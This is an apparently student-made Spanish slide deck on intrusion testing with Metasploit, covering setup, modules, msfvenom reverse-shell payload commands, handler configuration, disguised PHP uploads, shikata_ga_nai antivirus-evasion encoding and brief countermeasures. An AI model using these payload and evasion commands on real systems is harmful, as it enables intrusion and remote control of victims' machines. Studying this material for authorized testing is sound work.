SlideShare una empresa de Scribd logo
“Pruebas de intrusión mediante
Metasploit Framework”
Erlaitz Parreño Muñoz
2º ASIX
índice
1. Introducción_________________________________________ 3
1. Introducción Seguridad ____________________________ 4-5
2. Sistema informático _______________________________ 6-7
3. Introducción Metasploit Framework __________________ 8
2. Metasploit Framework_________________________________ 9
1. Arquitectura ______________________________________ 10
2. Módulos _________________________________________ 11
3. Ataques con Payloads ___________________________ 12-19
4. Codificadores y Auxiliares ________________________ 20-22
5. Contramedidas ___________________________________ 23
3. Conclusión__________________________________________ 24
4. Bibliografía__________________________________________ 25
2
1. Introducción
- Comprometer sistemas y servicios mediante malware.
- Paso a paso con ejemplos prácticos.
- Demostración práctica.
Sir Francis Bacon. - “El conocimiento es poder”
3
1.1 Introducción Seguridad
-Tipos de hackers:
1) Hacker Sombrero blanco:
- Encontrar vulnerabilidades para reportarlas.
- Actuar bajo permiso.
- No hacer daño.
“El término ‘hacker’ es algo digno de admirar”
Chema Alonso.
4Imagen 1: José María Alonso (CDO Telefónica)
1.1 Introducción Seguridad
-Tipos de hackers:
2) Hacker de sombrero negro:
- Violar el código ético de la seguridad informática.
- Actuar para beneficio propio.
- Causar el mayor daño posible.
“Un fantasma en el sistema”
Kevin Mitnick
5Imagen 2: Kevin Mitnick
1.2 Sistema informático
HARDWARE:
- Necesitaremos hacer uso de la distribución de debian Kali-Linux o
Parrot Security OS.
- Partición de 40GB EXT4y 2GB de SWAP.
- Procesador Quad-Core 64 bits.
¿Porque Kali-Linux o Parrot?
6Imagen 3: Instalación gráfica Live-CD
1.2 Sistema informático
SOFTWARE
- Agregar los repositorios necesarios de Kali.
- Utilizar herramienta “Terminator”.
7Imagen 5: Herramienta Terminator (Kali)
1.3 Introducción Metasploit Framework
● Que es Metasploit Framework.
● Labor que realiza MSF en el pentesting.
● Herramienta de pago o código abierto.
8Imagen 7: Ninja Metasploit (ASCII)
Imagen 6: H.D Moore Autor Metasploit
2. Metasploit Framework
Imagen 8: Logo Metasploit Framework (ASCII) 9
2.1 Arquitectura
10Imagen 9: Arquitectura Metasploit Framework
2.2 Módulos
11Imagen 10: Inicio Metasploit Framework (KALI)
- Exploits: Fragmentos del software.
- Payloads: Carga que se ejecutará en la vulnerabilidad (Meterpreter).
- Nops: Ejecutar el payload satisfactoriamente en la memoria.
- Codificadores: Codificar la firma.
- Auxiliares: Vía de recolección de información.
2.3 Ataques con payloads
12
Imagen 11: Comando msfvenom (KALI)
“MSFVENOM”
- Generador de payloads
- Asociado a una reverse shell
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=<TU IP
Address> LPORT=<Tu Puerto> -f <formato> > fichero.*
2.3 Ataques con payloads
METERPRETER
- abreviatura de The Meta-Interpreter.
- Se ejecuta completamente en memoria.
- Controlar el host de un dispositivo mediante VNC.
Imagen 12: Ejecución shell Meterpreter (KALI) 13
2.3 Ataques con payloads
Configurar Payload
- use exploit/multi/handler (Acceso rápido backdoor)
- set lhost <IP>
- set lport <port>
- Run/Exploit (Escucha)
Imagen 13: Configurando payload (KALI) 14
2.3 Ataques con payloads
Ejecución Ataque vía scripting:
- Víctima tiene que ejecutar nuestro payload.
- Camuflar el payload.
- Ingeniería social.
Imagen 17: Ejecutando payload (Atacante) 15
2.3 Ataques con payloads
Ejecución Ataque vía web (PHP):
- Encontrar vulnerabilidad de subida de ficheros.
- Camuflar el payload (jpeg, png, gif).
- Enviar directamente el malware en php.
16
Imagen 15: Vulnerabilidad subida ficheros (Servidor) Imagen 16: Reverse shell (Atacante)
2.3 Ataques con payloads
Imagen 20: Ejecutando payload Python (Atacante)
17
2.3 Ataques con payloads
Servicios Específicos:
2.3 Ataques con payloads
Servicios Específicos:
2.4 Codificadores y Auxiliares
Módulos Auxiliares:
- Recolección de información como objetivo.
- Identificar Puertos, Servicios, Usuarios, etc.
- Protocolo SMB
Imagen 18: Versión SMB (MSF) 20
2.4 Codificadores y Auxiliares
Módulos Encoding:
- Evitar la detección antivirus de nuestro payload.
- Codificador XOR polimórfico.
- “No hay más remedio”.
- Sustitución de instrucciones dinámicas y el ordenamiento dinámico
de bloques.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP>
LPORT=<Puerto> -e x86/shikata_ga_nai -f exe > shell.exe
21
2.4 Codificadores y Auxiliares
Módulos Encoding (Iteraciones):
22
2.5 Contramedidas
Protegernos de un ataque:
- La actualización del sistema operativo y de aquellas aplicaciones más
vulnerables.
- Antivirus que sea capaz de detectar este tipo de scripts maliciosos.
- Monitorizar la red para localizar puertos TCP extraños.
23
Imagen 19: Bitdefender
3. Conclusión
- Ampliación de conocimientos en ciberseguridad.
- Entender la importancia de la herramienta.
- Configuraciones y fallos a lo largo del proyecto.
24
3. Bibliografía
https://www.offensive-security.com/metasploit-unleashed/binary-payloads/
https://security.stackexchange.com/questions/78594/choosing-encoder-for-payloads-in-metasploit
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom
https://cybersecurity.upv.es/downloads/frop.pdf
https://es.wikipedia.org/wiki/Metasploit
http://www.elladodelmal.com/2018/03/metasploit-como-extender-las.html
http://www.reydes.com/d/?q=Fundamentos_de_Metasploit_Framework_para_la_Explotacion
https://netsec.ws/?p=331
25

Más contenido relacionado

PPSX
Qué es red hat
PPTX
Seguridad logica
PPT
Técnicas para la Obtención de Requerimientos
DOCX
Metodología de auditoría informática
PPTX
ingenieria del conocimiento
PPTX
La política informática en méxico
PPTX
Gerencia de la informacion
PPTX
Metodologias para el desarrollo de aplicaciones web
Qué es red hat
Seguridad logica
Técnicas para la Obtención de Requerimientos
Metodología de auditoría informática
ingenieria del conocimiento
La política informática en méxico
Gerencia de la informacion
Metodologias para el desarrollo de aplicaciones web

La actualidad más candente (20)

PDF
MAPA CONCEPTUAL DE LA IMPORTANCIA DE LAS REDES EN NUESTRO ENTORNO
PPTX
Mapa Conceptual Servidores web
DOCX
trabajo de redes mapa mental
PDF
Modelos de calidad CMMI - Moprosoft
PDF
Taller de Programación Distribuida
PPTX
Red hat linux
PPTX
COCOMO II
PDF
DOCX
Alcance de la auditoría informática
PPTX
Introducción a la ingeniería del software - cuestionario
PPTX
Sociedad e Impacto Ambiental del Hardware Libre,
PPTX
MAPA MENTAL INGENIERÍA DE REQUISITOS E INGENIERÍA DE REQUERIMIENTOS
PPS
Unidad 5: Instalación de sistemas operativos propietarios
PDF
RETOS ACTUALES DEL INGENIERO INFORMÁTICO Y DE LAS ÁREAS DE TI.
PDF
Mineria de datos
PPSX
Administración de redes
PPT
Atributos de calidad en el desarrollo de software
PDF
Ensayo sobre Inteligencia Artificial
PPT
Seguridad informática introduccion
MAPA CONCEPTUAL DE LA IMPORTANCIA DE LAS REDES EN NUESTRO ENTORNO
Mapa Conceptual Servidores web
trabajo de redes mapa mental
Modelos de calidad CMMI - Moprosoft
Taller de Programación Distribuida
Red hat linux
COCOMO II
Alcance de la auditoría informática
Introducción a la ingeniería del software - cuestionario
Sociedad e Impacto Ambiental del Hardware Libre,
MAPA MENTAL INGENIERÍA DE REQUISITOS E INGENIERÍA DE REQUERIMIENTOS
Unidad 5: Instalación de sistemas operativos propietarios
RETOS ACTUALES DEL INGENIERO INFORMÁTICO Y DE LAS ÁREAS DE TI.
Mineria de datos
Administración de redes
Atributos de calidad en el desarrollo de software
Ensayo sobre Inteligencia Artificial
Seguridad informática introduccion
Publicidad

Similar a Pruebas de intrusion mediante Metasploit Framework (20)

PDF
Cpods training-metasploit
PDF
Sad tema2 pen_test_iii
PDF
Memoria Pruebas de intrusion mediante Metasploit Framework
PPTX
Metasploit - Bypass UAC fodhelper [Post-explotación]
PDF
H-Con 2018: Hacking con Python
PDF
ShellCon 2018: Hacking con Python
PPTX
Armitage pruebas
PPTX
Armitage pruebas
PDF
Episodio de pentesting
PDF
Penetración con una Backdoor
PDF
Metasploit v0.5
PDF
Curso de Metasploit
PPTX
SecAdmin 2017: Hacking con Python
PPTX
HerramientasExplotacion-GRUPO5.pptx
PPTX
AMENAZAS EN LA RED- METAPLOIT.pptx
PDF
Test de intrusion
PPT
Evolución de las soluciones antimalware
PPT
Maitaining access
PPT
MAITAINING ACCESS
Cpods training-metasploit
Sad tema2 pen_test_iii
Memoria Pruebas de intrusion mediante Metasploit Framework
Metasploit - Bypass UAC fodhelper [Post-explotación]
H-Con 2018: Hacking con Python
ShellCon 2018: Hacking con Python
Armitage pruebas
Armitage pruebas
Episodio de pentesting
Penetración con una Backdoor
Metasploit v0.5
Curso de Metasploit
SecAdmin 2017: Hacking con Python
HerramientasExplotacion-GRUPO5.pptx
AMENAZAS EN LA RED- METAPLOIT.pptx
Test de intrusion
Evolución de las soluciones antimalware
Maitaining access
MAITAINING ACCESS
Publicidad

Último (20)

PDF
5.1 Pinch y Bijker en libro Actos, actores y artefactos de Bunch Thomas (coor...
PPTX
sa-cs-82-powerpoint-hardware-y-software_ver_4.pptx
PDF
Estrategia de apoyo tecnología miguel angel solis
PDF
Estrategia de apoyo tecnología grado 9-3
PDF
Maste clas de estructura metálica y arquitectura
PDF
CyberOps Associate - Cisco Networking Academy
PPTX
REDES INFORMATICAS REDES INFORMATICAS.pptx
DOCX
Zarate Quispe Alex aldayir aplicaciones de internet .docx
PPTX
Propuesta BKP servidores con Acronis1.pptx
PPTX
Presentación PASANTIAS AuditorioOO..pptx
PPTX
historia_web de la creacion de un navegador_presentacion.pptx
PDF
programa-de-estudios-2011-guc3ada-para-el-maestro-secundarias-tecnicas-tecnol...
PDF
Plantilla para Diseño de Narrativas Transmedia.pdf
PDF
Diapositiva proyecto de vida, materia catedra
PDF
MANUAL TECNOLOGÍA SER MINISTERIO EDUCACIÓN
PPTX
Power Point Nicolás Carrasco (disertación Roblox).pptx
PPTX
Sesion 1 de microsoft power point - Clase 1
PPT
El-Gobierno-Electrónico-En-El-Estado-Bolivia
PDF
Calidad desde el Docente y la mejora continua .pdf
PDF
Liceo departamental MICRO BIT (1) 2.pdfbbbnn
5.1 Pinch y Bijker en libro Actos, actores y artefactos de Bunch Thomas (coor...
sa-cs-82-powerpoint-hardware-y-software_ver_4.pptx
Estrategia de apoyo tecnología miguel angel solis
Estrategia de apoyo tecnología grado 9-3
Maste clas de estructura metálica y arquitectura
CyberOps Associate - Cisco Networking Academy
REDES INFORMATICAS REDES INFORMATICAS.pptx
Zarate Quispe Alex aldayir aplicaciones de internet .docx
Propuesta BKP servidores con Acronis1.pptx
Presentación PASANTIAS AuditorioOO..pptx
historia_web de la creacion de un navegador_presentacion.pptx
programa-de-estudios-2011-guc3ada-para-el-maestro-secundarias-tecnicas-tecnol...
Plantilla para Diseño de Narrativas Transmedia.pdf
Diapositiva proyecto de vida, materia catedra
MANUAL TECNOLOGÍA SER MINISTERIO EDUCACIÓN
Power Point Nicolás Carrasco (disertación Roblox).pptx
Sesion 1 de microsoft power point - Clase 1
El-Gobierno-Electrónico-En-El-Estado-Bolivia
Calidad desde el Docente y la mejora continua .pdf
Liceo departamental MICRO BIT (1) 2.pdfbbbnn

Pruebas de intrusion mediante Metasploit Framework